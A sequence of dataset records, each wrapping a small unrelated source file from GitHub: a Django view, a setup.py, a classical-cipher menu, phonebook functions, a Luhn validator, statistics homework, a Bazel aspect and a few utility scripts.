render(request, 'account.html', {'member': member,\n 'transactions': transactions,\n 'balance': balance,\n 'can_charge_annual_fee': can_charge})\n","repo_name":"ChrisCooper/cisc-332-project","sub_path":"carshare/carshare/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"5253386619","text":"# -*- coding: utf-8 -*-\n\nimport os\n\ntry:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\nfrom setuptools.command.test import test as TestCommand\n\nclass PyTest(TestCommand):\n def finalize_options(self):\n TestCommand.finalize_options(self)\n self.test_args = []\n self.test_suite = True\n def run_tests(self):\n import pytest\n pytest.main(self.test_args)\n\ndescription = 'Automatic rule-based tag suggestor for Pocket'\nif os.path.exists('README.md'):\n with open('README.md', 'r') as fp:\n long_description = fp.read()\nelse:\n long_description = description\n\nsetup(\n description=description,\n name='repocket',\n zip_safe=False,\n author='Kirill Borisov',\n author_email='borisov.kir@gmail.com',\n url='https://github.com/lensvol/repocket',\n keywords=['pocket', 'tag'],\n long_description=long_description,\n version='0.1.0',\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Environment :: Console',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n ],\n license='MIT',\n install_requires=[\n 'click==3.3',\n 'pocket==0.3.5',\n 'PyYAML==3.11',\n ],\n tests_require=['pytest'],\n cmdclass = {'test': PyTest},\n packages=['repocket', 'tests'],\n entry_points={\n 'console_scripts': ['repocket=repocket.main:processor']\n },\n)\n","repo_name":"lensvol/repocket","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"30552605282","text":"#!/usr/bin/python3\n'''\n@ODiN -iwnl-\n\nRequires AdditiveCipher.py , CeaserCipher.py ,\n OneTimePadCipher.py , AutoKeyCipher.py\n\n'''\n\nimport AdditiveCipher,CeaserCipher,OneTimePadCipher,AutoKeyCipher\n\ndef main():\n\n\twhile True:\n\t\tprint('\\n\\t\\t\\t|| Cipher Algorithms ||')\n\t\tprint('''\\n1. Additive Cipher\\n2. Ceaser Cipher\\n3. One Time Pad Cipher\\n4. AutoKey Cipher\\n5. 
Exit\\n''')\n\t\tch = int(input('Enter your choice : '))\n\n\t\tif ch is 1:\n\t\t\tAdditiveCipher.additive()\n\t\telif ch is 2:\n\t\t\tCeaserCipher.ceaser()\n\t\telif ch is 3:\n\t\t\tOneTimePadCipher.otpc()\n\t\telif ch is 4:\n\t\t\tAutoKeyCipher.AutoKey()\n\t\telif ch is 5:\n\t\t\texit(0)\n\t\telse:\n\t\t\tprint('Invalid Choice')\n\t\t\tpass\n\n# end of main\n\nif __name__ == '__main__':\n main()\n","repo_name":"AkhilendraGadde/CipherAlgorithms","sub_path":"CipherModules.py","file_name":"CipherModules.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"28678745898","text":"\n# method menampilakan daftar kontak\ndef display_kontak(daftar_kontak):\n # lakukan for loop dari data dictionary\n for kontak in daftar_kontak:\n print(\"===================\")\n print(f\"Nama: {kontak['nama']}\")\n print(f\"Email: {kontak['email']}\")\n print(f\"Telepon: {kontak['telepon']}\")\n\n#method tambah kontak\ndef new_kontak():\n nama = input(\"Nama :\")\n email = input(\"Email :\")\n telepon = input(\"Telepon :\")\n #buat variable \"kontak\" untuk menampung\n kontak = {\n \"nama\" : nama,\n \"email\" : email,\n \"telepon\" : telepon\n }\n #langsung return nilai kedalam kontak \n return kontak\n\n#method cari kontak\ndef cari_kontak(daftar_kontak):\n nama_dicari = input(\"Nama yang dicari : \")\n#lakukan for loop untuk akses data\n for kontak in daftar_kontak:\n nama = kontak[\"nama\"]\n #mencari data dengan method find, find mengembalikan posisi index karakter yang dicari, jika yang di cari \"e\" dari \"eko\" maka yang direturn adalah index[0], jika tidak ada maka -1\n if nama.lower().find(nama_dicari.lower()) != -1:\n print(\"=====================\")\n print(f\"Nama: {kontak['nama']}\")\n print(f\"Email: {kontak['email']}\")\n print(f\"Telepon: {kontak['telepon']}\")\n else:\n print(\"Nama tidak ditemukan\")\n\n\n#menghapus kontak\ndef del_kontak(daftar_kontak):\n #masukan nomor telepon untuk dicari terlebih dahulu\n telepon = input(\"No Telepon yang ingin dihapus : \")\n # set index di -1 untuk trigger ketika data tidak ada\n index = -1\n # lakukan for loop untuk mencari data kontak dengan range dimulai dari index 0 untuk mengambil jumlah data menggunkan len\n for i in range(0,len(daftar_kontak)):\n #hasil pencarian dimasukan kedalam variable kontak\n kontak = daftar_kontak[i]\n #jika \"telepon\" yang telah diinputkan sama dengan value yang ada dalam \"kontak\" break untuk menghentikan perulangan\n if telepon == kontak[\"telepon\"]:\n index = i\n break\n #jika hasil pencarian tidak ada didalam index yang dimulai dari 0 maka \"kontak tidak ditemukan\"\n if index == -1:\n print(\"Kontak tidak ditemukan!\")\n #jika ditemukan maka eksekusi function del\n else:\n del daftar_kontak[index]\n print(\"kontak berhasil dihapus!\")\n\n","repo_name":"alghif4ri/python-learning","sub_path":"mini project/phonebook/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":2330,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"20480040086","text":"class Luhn(object):\n def __init__(self, card_num):\n self.stripped = card_num.replace(' ','')\n self.card = list(self.stripped)[::-1]\n self.luhn = []\n\n def is_valid(self):\n if not self.stripped.isdigit() or len(self.stripped) < 2:\n return False\n for i in range(len(self.card)):\n if i % 2 == 1:\n double = int(self.card[i]) * 2\n self.luhn.append(double if double < 10 else double - 9)\n else:\n 
self.luhn.append(int(self.card[i]))\n        self.sum = sum(self.luhn)\n        return self.sum % 10 == 0\n","repo_name":"markostanojlovic/playingexercism","sub_path":"python/luhn/luhn_v1.py","file_name":"luhn_v1.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"39533431143","text":"import pandas as pd\nfrom statistics.inference import samples\nfrom statistics.inference import hypothesis\n\nimmune_tea_data = pd.read_csv('statistics/data/ImmuneTea.csv')\nwetsuit_data = pd.read_csv('statistics/data/Wetsuits.csv')\n\n# Q7.a Data: Wetsuits (difference of two means), Test: is there a difference in swimming speeds due to wearing a wetsuit\ntest_result = hypothesis.two_mean_test(wetsuit_data.describe(), ('Wetsuit', 'NoWetsuit'),\n                                       alternative='two-sided')\nprint(f'Q7: The p-value of the difference of means is {test_result[\"p-value\"]}')\n\n# Q7.a Data: Wetsuits (matched pair), Test: is there a difference in swimming speeds due to wearing a wetsuit\nwetsuit_data_difference = wetsuit_data['NoWetsuit'] - wetsuit_data['Wetsuit']\ntest_result = hypothesis.single_mean_test(wetsuit_data_difference, mu_0=0, alternative='two-sided')\nprint(f'Q7: The p-value as matched pairs is {test_result[\"p-value\"]}')\n\n# Q7.b\n# Q7.c Data Manipulation for the StatKey Simulation\nwetsuit_statkey = pd.DataFrame(\n    data={\n        'Time': wetsuit_data['Wetsuit'],\n        'Wetsuit': 'yes'\n    })\nwetsuit_statkey = wetsuit_statkey.append(pd.DataFrame(\n    data={\n        'Time': wetsuit_data['NoWetsuit'],\n        'Wetsuit': 'no'\n    }\n    ), ignore_index=True)\n# File for Two Means Simulation\nwetsuit_statkey.to_csv('/tmp/wetsuit_statkey_two-means.csv', index=False)\n\n# File for matched pairs Simulation\nwetsuit_data['Difference'] = wetsuit_data['Wetsuit'] - wetsuit_data['NoWetsuit']\nwetsuit_data.to_csv('/tmp/wetsuit_statkey_matched-pairs.csv', index=False)\n\n# Q11. The manufacturers are interested in estimating the percentage of defective light bulbs coming from a certain\n# process. They want a 90% confidence interval with a margin of error of 2%. How many light bulbs must they test?\nsample_size = samples.single_proportion_sample_size(margin=0.02, confidence_interval=0.90)\nprint(f'Q11: The size of the sample needed is {sample_size}')\n\n# Q12. Same question as in the previous problem, but assume they had a reason to believe the proportion is fairly close\n# to 6%. How large a sample must they test?\nsample_size = samples.single_proportion_sample_size(p_tilde=0.06, margin=0.02, confidence_interval=0.90)\nprint(f'Q12: The size of the sample needed is {sample_size}')\n\n# Q13. An airline has a regular flight between two cities. From a previous study, we estimate the standard deviation of\n# the flight times to be 9.34 minutes. We want a 99% confidence interval for the average flight time with a margin of\n# error of 3 minutes. How large a sample would we need to find that confidence interval?\nsample_size = samples.single_mean_sample_size(sigma_tilde=9.34, margin=3, confidence_interval=0.99)\nprint(f'Q13: The size of the sample needed is {sample_size}')\n\n# Q14. NOOP\nprint('Q14: NOOP')\n\n# Q15. Data: Immune Tea, Test: Production of interferon gamma is enhanced in tea drinkers?\ninterferon_gamma = immune_tea_data.groupby('Drink').describe().get('InterferonGamma').transpose()\ntest_result = hypothesis.two_mean_test(interferon_gamma, ('Tea', 'Coffee'), alternative='greater')\nprint(f'Q15: The p-value is {test_result[\"p-value\"]}')\ntest_result = hypothesis.two_mean_test(interferon_gamma, ('Tea', 'Coffee'), alternative='greater', df='satterthwait')\nprint(f'Q15: The p-value, using the Satterthwait approximation is {test_result[\"p-value\"]}')\n","repo_name":"cgamamx/dsc-381","sub_path":"homeworks/hw_10.py","file_name":"hw_10.py","file_ext":"py","file_size_in_byte":3751,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
+{"seq_id":"27904706311","text":"from pprint import pprint\nd = {}\n\nimport json\n\nwith open('./topics.txt', 'r') as f:\n    l = [list(map(lambda x: x.lower(), x.strip().split('\t'))) for x in f.readlines()]\n\n\nfor item in l:\n    pprint(item)\n    if len(item) == 2:\n        d[item[0]] = item[1].replace(' (parent topic)','')\n\n\npprint(d)\n\nwith open('categories.json', 'w') as fp:\n    json.dump(d, fp)\n\n","repo_name":"raphacosta27/projredesoc","sub_path":"projeto 2/collector/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"2969017033","text":"def _srcs_aspect_impl(target, ctx):\n\n    if hasattr(ctx.rule.attr, 'srcs'):\n        srcs = \" \".join([f.path for src in ctx.rule.attr.srcs for f in src.files])\n    else:\n        srcs = \"\"\n\n    print(\"srcs: \", srcs)\n\n    output = ctx.new_file(\"srcs.txt\")\n    outputs = [output]\n\n    ctx.file_action(\n        output = output,\n        content = srcs,\n    )\n\n    return struct(output_groups = {\"srcs\" : set(outputs)})\n\nsrcs_aspect = aspect(implementation = _srcs_aspect_impl,\n    attr_aspects = [\"deps\"]\n)","repo_name":"natansil/bazel-learning","sub_path":"bazel_aspect/extensions/srcs-aspect.bzl","file_name":"srcs-aspect.bzl","file_ext":"bzl","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
+{"seq_id":"10939070154","text":"# -*- coding: utf-8 -*-\nimport os\nimport errno\n\n\ndef silentremove(filename):\n    \"\"\"If ``filename`` exists, delete it. Otherwise, return nothing.\n    See http://stackoverflow.com/q/10840533/2823213.\"\"\"\n    try:\n        os.remove(filename)\n    except OSError as e:  # this would be \"except OSError, e:\" before Python 2.6\n        if e.errno != errno.ENOENT:  # errno.ENOENT = no such file or directory\n            raise  # re-raise exception if a different error occurred","repo_name":"ryanpdwyer/hdf5plotter","sub_path":"hdf5plotter/tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"22035069815","text":"item = int(input())\n\n\ndef n_sum(n):\n    n_cube_root = int(round(n ** (1. / 3.), 2))\n    for i in range(n_cube_root+1):\n        division = n - i ** 3\n        counter = i\n        for j in range(int(round(division**(1./3.), 2))+1):\n            if division == j**3:\n                if j > counter:\n                    print(counter, j)\n                    return True\n                else:\n                    print(j, counter)\n                    return True\n\n\nif not n_sum(item):\n    print('impossible')","repo_name":"Weakne55/MIPT","sub_path":"Sem1/Contest 4/Contest 4.E.py","file_name":"Contest 4.E.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"38505681580","text":"import argparse\n\nfrom omegaconf import OmegaConf\n\nfrom liteasr.models import MODEL_DATACLASS_REGISTRY\nfrom liteasr.optims import OPTIMIZER_DATACLASS_REGISTRY\nfrom liteasr.tasks import TASK_DATACLASS_REGISTRY\n\n\ndef main():\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"option\", type=str, help=\".